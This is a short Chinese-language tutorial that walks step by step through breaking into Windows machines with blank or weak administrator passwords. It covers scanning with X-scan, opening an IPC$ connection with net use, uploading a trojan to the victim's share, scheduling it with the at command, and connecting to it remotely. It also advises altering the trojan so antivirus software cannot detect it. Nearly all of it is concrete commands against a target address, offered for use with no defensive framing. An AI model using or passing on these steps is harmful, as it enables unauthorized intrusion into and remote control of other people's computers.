1 用扫描软件X-scan等搜寻存在弱口令的主机,如果扫描到一个具有管理员权限且没有设置密码的账户,即可继续下面的步骤;
2 下面有两条路可以走:一是在用户的电脑上运行telnet命令(命令行界面);二是上传木马(图形界面);下面以上传木马为例,为了抵抗杀毒软件,需要对木马进行免疫,让杀毒软件无法识别;
3 建立IPCS连接,使用命令:
net use \\192.168.1.122\ipc$ "" /user:administrator
4 接着查看用户电脑开启了什么共享,使用命令:
c:>net view \\192.168.1.122
5 知道了共享目录,上传木马服务端cmd.exe到用户共享文件夹下面,使用命令:
copy cmd.exe \\192.168.1.122\C:
6 在运行木马之前,查看用户电脑当前时间,使用命令:
net time \\192.168.1.122
7 用at命令设置任务计划,让木马在某一时间运行。(需要开启task Scheduler服务),使用命令:
at \\192.168.1.122 22:00 C:\cmd.exe
8 到了22:00后,便可以用客户端连接用户的服务端了;